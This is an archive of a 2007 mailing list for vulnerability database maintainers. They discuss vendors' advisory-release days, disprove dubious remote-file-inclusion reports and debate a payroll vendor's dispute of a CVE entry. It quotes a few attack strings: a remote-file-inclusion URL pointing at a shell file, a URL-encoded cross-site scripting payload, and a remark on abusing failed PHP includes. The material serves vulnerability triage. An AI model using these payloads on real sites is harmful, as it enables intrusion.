-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: * inc/template.ext.class.inc.php?path=http://shell.txt? * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ************************************************************************************************** From coley at mitre.org Tue Feb 13 20:40:19 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 13 Feb 2007 20:40:19 -0500 (EST) Subject: [VIM] Tuesday flood Message-ID: <200702140140.l1E1eJRl011310@faron.mitre.org> Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing multi-issue advisories on the same day? Ouch. This kind of pattern can't be good for sysadmins. - Steve From ge at linuxbox.org Tue Feb 13 20:41:36 2007 From: ge at linuxbox.org (Gadi Evron) Date: Tue, 13 Feb 2007 19:41:36 -0600 (CST) Subject: [VIM] Tuesday flood In-Reply-To: <200702140140.l1E1eJRl011310@faron.mitre.org> Message-ID: On Tue, 13 Feb 2007, Steven M. Christey wrote: > > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing > multi-issue advisories on the same day? Ouch. This kind of pattern > can't be good for sysadmins. Agreed, but should other vendors care if Microsoft releases on a certain day? Maybe for their client-base, but... Crazy day. > > - Steve > From coley at mitre.org Wed Feb 14 02:32:22 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 14 Feb 2007 02:32:22 -0500 (EST) Subject: [VIM] false: old Develooping Flash Chat RFI Message-ID: <200702140732.l1E7WMct015257@faron.mitre.org> Researcher: SpC-x Ref: Develooping Flash Chat (banned_file) Remote File Inclusion http://archives.neohapsis.com/archives/bugtraq/2006-06/0317.html Claimed exploit: http://www.target.com/path/chat/adminips.php?banned_file=CmdShell Source inspection of versions 1.2, 1.5, and 1.6.5, as downloaded from www.vclcomponents.com, showed the following code: require ('required/config.php'); $banned_file = "required/banned_ip.txt"; if (($name==$admin_name) and ($password==$admin_password)){ $lines = file($banned_file); config.php had nothing but variable declarations. - Steve From aviram at beyondsecurity.com Wed Feb 14 03:50:13 2007 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Wed, 14 Feb 2007 10:50:13 +0200 Subject: [VIM] Tuesday flood In-Reply-To: <200702140140.l1E1eJRl011310@faron.mitre.org> References: <200702140140.l1E1eJRl011310@faron.mitre.org> Message-ID: <200702141050.13755.aviram@beyondsecurity.com> On Wednesday 14 February 2007 03:40, Steven M. Christey wrote: > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing > multi-issue advisories on the same day? Ouch. This kind of pattern > can't be good for sysadmins. Absolutely. The reason seems pretty clear, though - if you're only contributing a bucket to an already existing flood there is much less bad PR for you. Especially if you piggy-back off Microsoft who will take most of the heat anyway. > > - Steve - Aviram From jericho at attrition.org Wed Feb 14 03:52:23 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 14 Feb 2007 03:52:23 -0500 (EST) Subject: [VIM] Tuesday flood In-Reply-To: <200702141050.13755.aviram@beyondsecurity.com> References: <200702140140.l1E1eJRl011310@faron.mitre.org> <200702141050.13755.aviram@beyondsecurity.com> Message-ID: : On Wednesday 14 February 2007 03:40, Steven M. Christey wrote: : > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing : > multi-issue advisories on the same day? Ouch. This kind of pattern : > can't be good for sysadmins. : : The reason seems pretty clear, though - if you're only contributing a : bucket to an already existing flood there is much less bad PR for you. : Especially if you piggy-back off Microsoft who will take most of the : heat anyway. Don't know abou tthe rest of you, but I keep having this strong desire to whip up some graphics showing various 'storms' of vulnerability disclosures from the big vendors and pronouncing this as some 'perfect storm' of disclosure. Al Pacino will star as Steve Christey, Christian Slater as Jericho. From ge at linuxbox.org Wed Feb 14 07:28:39 2007 From: ge at linuxbox.org (Gadi Evron) Date: Wed, 14 Feb 2007 06:28:39 -0600 (CST) Subject: [VIM] Tuesday flood In-Reply-To: Message-ID: On Wed, 14 Feb 2007, security curmudgeon wrote: > > > : On Wednesday 14 February 2007 03:40, Steven M. Christey wrote: > : > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing > : > multi-issue advisories on the same day? Ouch. This kind of pattern > : > can't be good for sysadmins. > : > : The reason seems pretty clear, though - if you're only contributing a > : bucket to an already existing flood there is much less bad PR for you. > : Especially if you piggy-back off Microsoft who will take most of the > : heat anyway. > > Don't know abou tthe rest of you, but I keep having this strong desire to > whip up some graphics showing various 'storms' of vulnerability > disclosures from the big vendors and pronouncing this as some 'perfect > storm' of disclosure. > > Al Pacino will star as Steve Christey, Christian Slater as Jericho. > I fear who you will ask to play me. From coley at mitre.org Wed Feb 14 13:56:49 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 14 Feb 2007 13:56:49 -0500 (EST) Subject: [VIM] false: old Jobline RFI Message-ID: <200702141856.l1EIunE9023703@faron.mitre.org> Researcher: SpC-x Ref: BUGTRAQ Jobline 1 1 1 Version - Remote File Include Vulnerability http://www.securityfocus.com/archive/1/archive/1/436990/30/4440/threaded Vector: admin.jobline.php?mosConfig_absolute_path=[RFI] admin.jobline.php in Jobline Component 1.1.1, as obtained from http://scripts.ringsworld.com/classified-ads/jobline-1-1-1/, starts off with: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); This product was released around October 2005, so if there's a vuln, it's in an older version. - Steve From coley at linus.mitre.org Wed Feb 14 19:31:20 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 14 Feb 2007 19:31:20 -0500 (EST) Subject: [VIM] Tuesday flood In-Reply-To: References: Message-ID: On Wed, 14 Feb 2007, Gadi Evron wrote: > On Wed, 14 Feb 2007, security curmudgeon wrote: > > > > disclosures from the big vendors and pronouncing this as some 'perfect > > storm' of disclosure. > > > > Al Pacino will star as Steve Christey, Christian Slater as Jericho. > > > > I fear who you will ask to play me. Guest starring Gadi Evron as himself, of course! The DVD commentary by the director will be filled with veiled references to "tension on the set." I like Brian's idea (perfect storm, brilliant!), and it feels like a pattern, but... does anybody have the data to figure this out automatically without manual data collection? CVE keeps the initial disclosure date and that's about it, so at best, we could only spot disclosures that came from vendor advisories. We don't record when each vendor actually released an advisory. Brian Krebs probably has some data on that, but only for a couple vendors. On a semi-related note, I breezed through some CVE stats a day or two ago to see which days were most popular for disclosure, overall. It used to be Wednesday, but the past couple years it's been Tuesday. Both Microsoft and Oracle release on Tuesdays, so that might be a part of the increase. Mozilla released on Tuesday in December and November, but Thursday in September and July. Apple does Tuesdays, but not all the time. Friday, Saturday, and Sunday are always at the bottom of the list, in that order. I can dig 'em up if people are interested. - Steve From ge at linuxbox.org Wed Feb 14 20:10:51 2007 From: ge at linuxbox.org (Gadi Evron) Date: Wed, 14 Feb 2007 19:10:51 -0600 (CST) Subject: [VIM] Tuesday flood In-Reply-To: Message-ID: On Wed, 14 Feb 2007, Steven M. Christey wrote: > > On Wed, 14 Feb 2007, Gadi Evron wrote: > > > On Wed, 14 Feb 2007, security curmudgeon wrote: > > > > > > disclosures from the big vendors and pronouncing this as some 'perfect > > > storm' of disclosure. > > > > > > Al Pacino will star as Steve Christey, Christian Slater as Jericho. > > > > > > > I fear who you will ask to play me. > > Guest starring Gadi Evron as himself, of course! The DVD commentary by > the director will be filled with veiled references to "tension on the > set." > > I like Brian's idea (perfect storm, brilliant!), and it feels like a > pattern, but... does anybody have the data to figure this out > automatically without manual data collection? CVE keeps the initial > disclosure date and that's about it, so at best, we could only spot > disclosures that came from vendor advisories. We don't record when each > vendor actually released an advisory. Brian Krebs probably has some data > on that, but only for a couple vendors. > > On a semi-related note, I breezed through some CVE stats a day or two ago > to see which days were most popular for disclosure, overall. It used to > be Wednesday, but the past couple years it's been Tuesday. Both Microsoft > and Oracle release on Tuesdays, so that might be a part of the increase. > Mozilla released on Tuesday in December and November, but Thursday in > September and July. Apple does Tuesdays, but not all the time. > > Friday, Saturday, and Sunday are always at the bottom of the list, in that > order. I can dig 'em up if people are interested. Tuesday sounds like a great day to be honest. Not monday, and most time until-end-of-week. I believe maybe OSVDB (with some support we can pull for them together) or a new joint site can probably allocate release dates for vendors if they are to be responsible. I have a feeling I can sell this to Microsoft. > > - Steve > From jericho at attrition.org Wed Feb 14 20:22:05 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 14 Feb 2007 20:22:05 -0500 (EST) Subject: [VIM] Tuesday flood In-Reply-To: References: Message-ID: : I like Brian's idea (perfect storm, brilliant!), and it feels like a : pattern, but... does anybody have the data to figure this out : automatically without manual data collection? CVE keeps the initial : disclosure date and that's about it, so at best, we could only spot : disclosures that came from vendor advisories. We don't record when each : vendor actually released an advisory. Brian Krebs probably has some : data on that, but only for a couple vendors. OSVDB tracks disclosure date, based on the vendor advisory. If the vendor advisory is for an issue already disclosed, we track the disclosure date based on the initial disclosure, not the advisory. From coley at linus.mitre.org Thu Feb 15 00:45:45 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 15 Feb 2007 00:45:45 -0500 (EST) Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) Message-ID: Oh yeah, Gadi/Aviram - Brian and I have adopted an informal policy of stripping out vendor email addresses for disputes, since some might be private. CVE has no opinion on this dispute. - Steve ---------- Forwarded message ---------- Date: Thu, 15 Feb 2007 14:15:27 +1000 From: Kwik-Pay Support To: cve at mitre.org Subject: CVE-2006-1050 (under review) It has just been brought to our attention that you have created this 'security problem' regarding our software. Why is that no-one from your organisation contacted us prior to publishing that information or even since? The kwikpay.mdb file supplied with kwikpay is a template for the database structure of user databases created by kwikpay and to store a demonstration payroll. It does not contain any sensitive user information. When a user payroll database is opened, the encryption of the database is checked and if the database is not encrypted, the user is prompted to encrypt the database, but the choice is the customers. Data in the database is intended to be accessible to the user for other applications such as Excel. It is entirely the user's choice as to whether they enforce security. The data belongs to them not kwikpay. Please update your notice to indicate that no problem exists. Alastair Robertson From sullo at cirt.net Thu Feb 15 00:49:20 2007 From: sullo at cirt.net (Sullo) Date: Thu, 15 Feb 2007 00:49:20 -0500 Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: References: Message-ID: <45D3F460.8040800@cirt.net> Steven M. Christey wrote: > CVE has no opinion on this dispute. > CVE has none... but I bet Steve has a strong opinion :-) From sullo at cirt.net Thu Feb 15 00:55:12 2007 From: sullo at cirt.net (Sullo) Date: Thu, 15 Feb 2007 00:55:12 -0500 Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: <45D3F460.8040800@cirt.net> References: <45D3F460.8040800@cirt.net> Message-ID: <45D3F5C0.3090408@cirt.net> Just to throw some more fuel on the fire: http://www.kwik-pay.com/changehistory.php?Country=au .... 15 Mar 2006 - 4.2.22 Database not properly encrypted by version 4.2.21 10 Mar 2006 - 4.2.21 Add facility to encrypt and decrypt Kwik-Pay payroll databases .... -- http://www.cirt.net/ | http://www.osvdb.org/ From aviram at beyondsecurity.com Thu Feb 15 04:01:30 2007 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Thu, 15 Feb 2007 11:01:30 +0200 Subject: [VIM] Tuesday flood In-Reply-To: References: Message-ID: <200702151101.31485.aviram@beyondsecurity.com> On Thursday 15 February 2007 02:31, Steven M. Christey wrote: > > I like Brian's idea (perfect storm, brilliant!), and it feels like a > pattern, but... does anybody have the data to figure this out > automatically without manual data collection? At SecuriTeam we have the date OUR advisory was published, although it might be off by +-1 from the original depending on the timezone, the time we picked it up on the wire, additional time if we needed to verify it, etc. So if you're looking for days-of-the-week patterns I don't think it's very accurate, but if you're looking for days-of-month (or busiest period of the year) it might help establish a pattern. There's an auto-generated page at: http://www.securiteam.com/stats.html that shows some examples. > > - Steve - Aviram From aviram at beyondsecurity.com Thu Feb 15 04:11:30 2007 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Thu, 15 Feb 2007 11:11:30 +0200 Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: References: Message-ID: <200702151111.30531.aviram@beyondsecurity.com> On Thursday 15 February 2007 07:45, Steven M. Christey wrote: > Oh yeah, Gadi/Aviram - Brian and I have adopted an informal policy of > stripping out vendor email addresses for disputes, since some might be > private. > > CVE has no opinion on this dispute. Then "CVE" must have much more patience than I do :-) Not sure how you resolve cases like this (when it's obvious the vendor is talking out of his ass) but what we usually do is add the vendor's response to the advisory - verbatim. This way the vendor gets his say, and his customers get to see how stupid he really is. Seems like a win-win to us. > > - Steve > - Aviram From mjc at redhat.com Thu Feb 15 06:13:24 2007 From: mjc at redhat.com (Mark J Cox) Date: Thu, 15 Feb 2007 11:13:24 +0000 (GMT) Subject: [VIM] Tuesday flood In-Reply-To: References: Message-ID: > On a semi-related note, I breezed through some CVE stats a day or two ago > to see which days were most popular for disclosure, overall. For Red Hat security advisories in 2006 and date based on Eastern Time: Sunday 0% Monday 8% ######## Tuesday 28% ########################### Wednesday 29% ############################ Thursday 23% ####################### Friday 11% ########### Saturday 1% # There was one issue pushed on Saturday (actually at the end of a long Friday, 16 minutes past midnight ET to correct a critical Firefox flaw). These stats are partially under our control: we'll hold off pushing an advisory rated moderate or low severity even for public issues until a Tue/Wed/Thu. But for a critical rated public issue we'll push as soon as the update passes QA, no matter what day or time. Mark From aviram at beyondsecurity.com Thu Feb 15 09:44:40 2007 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Thu, 15 Feb 2007 16:44:40 +0200 Subject: [VIM] [OT] Beers in Virginia Message-ID: <200702151644.41207.aviram@beyondsecurity.com> Sorry to hijack the mailing list for totally irelevant purposes, but I noticed that the DC/Virginia area has a lot of security experts and no organized meeting forum (at least, that I know of). I know that several of the members of the list are from that area, and as for us - we have an office in McLean, which is normally populated by sales people but gets occasional visits from Noam, Gadi and myself once in a while. I think it could be nice to arrange informal meetings for beers/steaks/coffee/pool/whatever with or without the pretense of talking about security problems and how to solve them. I'm thinking about a social gathering that gives a chance to put faces to emails. If there's already a "club" that I don't know about, feel free to enlighten me (but let me know if they accept people like me - obviously I can't join if they do). If not, here's a call for action: Next Friday, the 23rd at the Rock Bottom Brewery in Ballston Mall. Possible alternatives: Any other day of the week next week, and any other beer or pool place in the Northern Virginia/DC/Maryland area. Any takers? (list managers: let me know if I'm completely out of line with this) - Aviram From jms at bughunter.ca Thu Feb 15 13:53:30 2007 From: jms at bughunter.ca (J. M. Seitz) Date: Thu, 15 Feb 2007 10:53:30 -0800 Subject: [VIM] Sigh Message-ID: <003901c75132$96703860$4d07a8c0@jseitz> So, I would change "Grep n Gripe" to "Grep n Gripe Pipe mail". JS hey guys .. check out this new xss i just found ;P Vulnerable : Calendar Express 2 web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/ XSS : http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27b l4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1 ################################ Discovered By BLacK ZeRo K.S.A bL4ck at bsdmail.org ################################ Best regards ,, hey guys .. check out this new xss i just found ;P Vulnerable : deskpro.com v1.1.0 web : http://www.deskpro.com, http://customers.qwk.net Version : v1.1.0 XSS : http://127.0.0.1/dp/faq.php?article="> ################################ Discovered By BLacK ZeRo K.S.A bL4ck at bsdmail.org ################################ Best regards ,, -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20070215/e39ce3ed/attachment-0001.html From theall at tenablesecurity.com Thu Feb 15 15:40:31 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 15 Feb 2007 15:40:31 -0500 Subject: [VIM] RSSMini Exploit -- Probably Not Message-ID: <45D4C53F.5080104@tenablesecurity.com> This concerns : I just grabbed the source for rssminifolder (http://rssmini.com/rssminifolder.zip). folder/index.php looks like this: include("config.php"); ^M ... ^M There's no config.php file by default in the folder directory so this will work if register_globals is enabled and someone just unzips a copy of the software under their document directory. However, to actually install it, you're supposed to copy the config.php file from folder's parent directory after editing it, and that has this line: $url = "http://rssmini.com/demo5";^M I see nowhere in either file where $url can be overwritten by user-supplied input. The other files mentioned in the milw0rm posting behave the same as index.php, at least as far as the exploit is concerned. So in sum, this only looks like a problem if someone hasn't installed the software and has register_globals enabled. P.S: Hope I got it right this time, str0ke. :-) George -- theall at tenablesecurity.com From theall at tenablesecurity.com Thu Feb 15 15:47:13 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 15 Feb 2007 15:47:13 -0500 Subject: [VIM] Drupal Preview Comments Remote Code Execution Vulnerability Message-ID: <45D4C6D1.60601@tenablesecurity.com> Sigh, looks like Security Focus just created BID 22579 for the Drupal exploits str0ke just wrote for the flaws already covered by BID 22306. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Thu Feb 15 15:47:48 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 15 Feb 2007 14:47:48 -0600 Subject: [VIM] RSSMini Exploit -- Probably Not In-Reply-To: <45D4C53F.5080104@tenablesecurity.com> References: <45D4C53F.5080104@tenablesecurity.com> Message-ID: <814b9d50702151247r2751fe22w5f3f377d555d9857@mail.gmail.com> Hey brotha, Your correct, if they install the product correctly then it isn't vulnerable. Removing it from the exploits section. /str0ke On 2/15/07, George A. Theall wrote: > This concerns : > > I just grabbed the source for rssminifolder > (http://rssmini.com/rssminifolder.zip). folder/index.php looks like this: > > include("config.php"); ^M > ... > ^M > > There's no config.php file by default in the folder directory so this > will work if register_globals is enabled and someone just unzips a copy > of the software under their document directory. However, to actually > install it, you're supposed to copy the config.php file from folder's > parent directory after editing it, and that has this line: > > $url = "http://rssmini.com/demo5";^M > > I see nowhere in either file where $url can be overwritten by > user-supplied input. > > The other files mentioned in the milw0rm posting behave the same as > index.php, at least as far as the exploit is concerned. > > So in sum, this only looks like a problem if someone hasn't installed > the software and has register_globals enabled. > > P.S: Hope I got it right this time, str0ke. :-) > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Thu Feb 15 15:56:47 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 15 Feb 2007 14:56:47 -0600 Subject: [VIM] Drupal Preview Comments Remote Code Execution Vulnerability In-Reply-To: <45D4C6D1.60601@tenablesecurity.com> References: <45D4C6D1.60601@tenablesecurity.com> Message-ID: <814b9d50702151256w52b8fabi2f2b75321c164fa5@mail.gmail.com> Hopefully they will also update the files with the latest version aswell, since the current version on the webpage doesn't work correctly. /str0ke On 2/15/07, George A. Theall wrote: > Sigh, looks like Security Focus just created BID 22579 for the Drupal > exploits str0ke just wrote for the flaws already covered by BID 22306. > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Thu Feb 15 16:09:17 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 15 Feb 2007 15:09:17 -0600 Subject: [VIM] [milw0rm] exploit 3305 Message-ID: <814b9d50702151309q518310dcg93e4460481a0932c@mail.gmail.com> Seems the author crazy sent in the vulnerability around 2 days after sn0oPy. So sn0oPy has been credited with the discovery. http://milw0rm.com/exploits/3305 this exploit it's credited to sn0oPy (me) http://securityreason.com/securityalert/2232 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2007-02/msg00133.html http://lists.virus.org/bugtraq/msg00127.html http://www.securityfocus.com/archive/1/459655 From rkeith at securityfocus.com Thu Feb 15 15:55:19 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Thu, 15 Feb 2007 13:55:19 -0700 (MST) Subject: [VIM] re Drupal Preview Comments Remote Code Execution Vulnerability (fwd) Message-ID: Quite right, an error on our part. The respective BIDs are being corrected. Thanks for the heads up George. The files are also being updated, thanks str0ke. -- Rob Keith Symantec ---------- Forwarded message ---------- Date: Thu, 15 Feb 2007 14:56:47 -0600 From: str0ke Reply-To: Vulnerability Information Managers To: Vulnerability Information Managers Subject: Re: [VIM] Drupal Preview Comments Remote Code Execution Vulnerability Hopefully they will also update the files with the latest version aswell, since the current version on the webpage doesn't work correctly. /str0ke On 2/15/07, George A. Theall wrote: > Sigh, looks like Security Focus just created BID 22579 for the Drupal > exploits str0ke just wrote for the flaws already covered by BID 22306. > > George > -- > theall at tenablesecurity.com > From coley at linus.mitre.org Thu Feb 15 17:23:42 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 15 Feb 2007 17:23:42 -0500 (EST) Subject: [VIM] RSSMini Exploit -- Probably Not In-Reply-To: <45D4C53F.5080104@tenablesecurity.com> References: <45D4C53F.5080104@tenablesecurity.com> Message-ID: On Thu, 15 Feb 2007, George A. Theall wrote: > > include("config.php"); ^M > ... > ^M > > There's no config.php file by default in the folder directory so this > will work if register_globals is enabled and someone just unzips a copy > of the software under their document directory. Oh. My. God. I can't believe this... the application doesn't exit on a failed include? I just tested this and it's true, but... wow. Oh wait, I see - require() will trigger a fatal exit. OK. I didn't know about this feature of PHP. But - there's a whole bunch of vulnerabilities waiting to be found that rely on this behavior, 'cause I bet a bunch of PHP programmers don't really understand this. Is it protected against traversal and RFI, but uses user input? Fine, just use an invalid value, trigger a failed include, and related variables become yours. Ya learn something new every day. - Steve From coley at mitre.org Thu Feb 15 17:43:29 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 15 Feb 2007 17:43:29 -0500 (EST) Subject: [VIM] affected versions for old MySQL ALTER TABLE (CVE-2004-0835) Message-ID: <200702152243.l1FMhTIL011851@faron.mitre.org> It was brought to my attention that CVE-2004-0835 lists a variety of affected versions, but many other vdb's only list one or two. The narrower version range was probably inherited from some Linux distro that only supported one or two release trees. Debian released an advisory on Oct 11, 2004 and Red Hat released one on the 20th, and both of these only covered 3.23; later advisories added more versions. It took a bit of digging, but I found some other proof that it affects more than 3.23: http://www.mysql.org/doc/refman/4.1/en/news-4-0-19.html http://www.mysql.org/doc/refman/4.1/en/news-4-1-2.html Just search for "CVE-2004-0835" It was *not* listed in the 5.0.1 changelog, however, and I'm not exactly sure where we got that from for the CVE description. - Steve From coley at linus.mitre.org Thu Feb 15 18:51:46 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 15 Feb 2007 18:51:46 -0500 (EST) Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: <200702151111.30531.aviram@beyondsecurity.com> References: <200702151111.30531.aviram@beyondsecurity.com> Message-ID: Well, I just got another email from the developer asking me to remove the X-Force item that was apparently deleted (which we won't, because of historical reasons, not to mention that the dispute is still pending), and to change the description because it doesn't match what SECUNIA:19075 says. But it says "The security issue has been confirmed in version 4.2.20... Update to version 4.2.22." Which sure sounds to me like there used to be an issue and now there isn't. Does anybody know of a changelog entry? I eagerly await their reply. By the way - does anybody record retracted disputes? We have "* DISPUTED *" in the description only while the dispute is active, but I know we've had a number of retractions. - Steve From steve at vitriol.net Thu Feb 15 19:01:40 2007 From: steve at vitriol.net (Steve Tornio) Date: Thu, 15 Feb 2007 18:01:40 -0600 Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: References: <200702151111.30531.aviram@beyondsecurity.com> Message-ID: <45D4F464.8070303@vitriol.net> Steven M. Christey wrote: > Well, I just got another email from the developer asking me to remove the > X-Force item that was apparently deleted (which we won't, because of > historical reasons, not to mention that the dispute is still pending), and > to change the description because it doesn't match what SECUNIA:19075 > says. But it says "The security issue has been confirmed in version > 4.2.20... Update to version 4.2.22." Which sure sounds to me like there > used to be an issue and now there isn't. Does anybody know of a changelog > entry? > > I eagerly await their reply. > > By the way - does anybody record retracted disputes? We have "* DISPUTED > *" in the description only while the dispute is active, but I know we've > had a number of retractions. > > - Steve > We got the same message. I removed the ISS entry, because on our side, the broken link doesn't do us much good. I'll happily re-add it if the entry re-appears. Google cache still has the entry, and it's basically the same information as what we both have. I asked him to clarify his problem between Secunia's description and ours. I can't imagine we'll be moved by his arguments. Sullo posted a changelog entry earlier that indicated they added ineffective encryption in 4.2.21 and then fixed the encryption for 4.2.22. Steve osvdb.org From coley at linus.mitre.org Thu Feb 15 19:10:40 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 15 Feb 2007 19:10:40 -0500 (EST) Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: <45D4F464.8070303@vitriol.net> References: <200702151111.30531.aviram@beyondsecurity.com> <45D4F464.8070303@vitriol.net> Message-ID: On Thu, 15 Feb 2007, Steve Tornio wrote: > I asked him to clarify his problem between Secunia's description and > ours. I can't imagine we'll be moved by his arguments. Sullo posted a > changelog entry earlier that indicated they added ineffective encryption > in 4.2.21 and then fixed the encryption for 4.2.22. Whoops, somehow missed that one, thanks. - Steve From theall at tenablesecurity.com Thu Feb 15 19:38:56 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 15 Feb 2007 19:38:56 -0500 Subject: [VIM] RSSMini Exploit -- Probably Not In-Reply-To: References: <45D4C53F.5080104@tenablesecurity.com> Message-ID: <45D4FD20.9000106@tenablesecurity.com> Steven M. Christey wrote: > I can't believe this... the application doesn't exit on a failed include? This is the difference between include() and require() -- the latter exits while the former doesn't. George -- theall at tenablesecurity.com From steve at vitriol.net Thu Feb 15 20:22:32 2007 From: steve at vitriol.net (Steve Tornio) Date: Thu, 15 Feb 2007 19:22:32 -0600 Subject: [VIM] [OSVDB Mods] [Change Request] 23617: Kwik-Pay Payroll KwikPay.mdb Information Disclosure In-Reply-To: <1171582476.45d4ee0c705f2@email.ixwebhosting.com> References: <1171581210.45d4e91a0f10e@mail.opentransfer.com> <45D4EA55.3000005@vitriol.net> <1171582476.45d4ee0c705f2@email.ixwebhosting.com> Message-ID: <45D50758.3080500@vitriol.net> Kwik-Pay Support wrote: > It's just that the kwikpay.mdb file contains fictitious demonstration data - not > any sensitive employment or payment related data. It implies that a file that > was never intended to be secured should be secured. So, your objection is due to the inclusion of an actual filename? We're all agreed that the contents of databases prior to version 4.2.22 were trivially accessible to a local user? > > It only applies if the user themselves create their own payroll database in the > installation directory. The software itself does not force any user payroll > database to be created there - it is only created there if the user specifically > requests it! > > I'd prefer if the whole report was removed as we believe that it was created by > people who did not understand how the system worked, and did not even contact us > to find out before they created the report! If the databases are trivially accessible by local users, then the entry will certainly stay. Most installations will follow the path of least resistance, and unless the program requires an encrypted database, then this is a legitimate concern. > > p.s. I had some correspondence with Brian yesterday. Is he always so offensive? > OSVDB is a volunteer effort, staffed by people whose only goal is to provide a comprehensive, accurate database of reported computer and network security vulnerabilities. Brian has been a key force in making our database as complete and accurate as we can make it, with no compensation and little recognition. I'm proud to work with him for an equivalent amount of compensation and recognition. So, when we are approached by someone, and the very first accusatory words of his email are, "It has just been brought to our attention that you have created this 'security problem' regarding our software," we don't feel the need to mince words. The vulnerability was created by an oversight in the development of the application, it was reported by independent researchers, and then recorded in our database, as accurately as we are able. We are happy to correct errors in the database. We are not as happy to take ill-founded abuse as we do it. I will update our description to remove the offending file name, as it sounds like a more accurate description of the vulnerability. Thanks, Steve Tornio osvdb.org From sullo at cirt.net Thu Feb 15 22:26:50 2007 From: sullo at cirt.net (Sullo) Date: Thu, 15 Feb 2007 22:26:50 -0500 Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: References: <200702151111.30531.aviram@beyondsecurity.com> Message-ID: <45D5247A.1040901@cirt.net> Steven M. Christey wrote: > Well, I just got another email from the developer asking me to remove the > X-Force item that was apparently deleted > So, two things... the real question (in my mind), is *why* did ISS remove their entry, just because the vendor said to? And secondly, if the Kwik-Pay person's goal is to keep the issue hush-hush and get it off the internets, I wonder if he's noticed the VIM archives over on attrition.org... :-) -- http://www.cirt.net/ | http://www.osvdb.org/ From steve at vitriol.net Thu Feb 15 22:35:02 2007 From: steve at vitriol.net (Steve Tornio) Date: Thu, 15 Feb 2007 21:35:02 -0600 Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: <45D5247A.1040901@cirt.net> References: <200702151111.30531.aviram@beyondsecurity.com> <45D5247A.1040901@cirt.net> Message-ID: <45D52666.9030109@vitriol.net> Sullo wrote: > And secondly, if > the Kwik-Pay person's goal is to keep the issue hush-hush and get it off > the internets, I wonder if he's noticed the VIM archives over on > attrition.org... :-) > > I've actually had a little bit of an email exchange, and he's a lost cause. Somehow, the fact that OSVDB included the filename of the default database as a vector is a cardinal sin, and horrifyingly inaccurate, but databases existing unencrypted and available to any local user isn't a big deal. So, I modified the entry to be more like Secunia, and state that all databases are trivially available, and that's somehow better in his mind. Oh well, he also said I need to find a more productive use of my time. Like not continuing my discussion with him, I think :) Steve From coley at linus.mitre.org Fri Feb 16 01:40:09 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 16 Feb 2007 01:40:09 -0500 (EST) Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: <45D52666.9030109@vitriol.net> References: <200702151111.30531.aviram@beyondsecurity.com> <45D5247A.1040901@cirt.net> <45D52666.9030109@vitriol.net> Message-ID: On Thu, 15 Feb 2007, Steve Tornio wrote: > Oh well, he also said I need to find a more productive use of my time. > Like not continuing my discussion with him, I think :) There I go, not having an opinion again. - Steve From jms at bughunter.ca Fri Feb 16 03:07:23 2007 From: jms at bughunter.ca (Justin Seitz) Date: Fri, 16 Feb 2007 02:07:23 -0600 (CST) Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: References: <200702151111.30531.aviram@beyondsecurity.com> <45D5247A.1040901@cirt.net> <45D52666.9030109@vitriol.net> Message-ID: 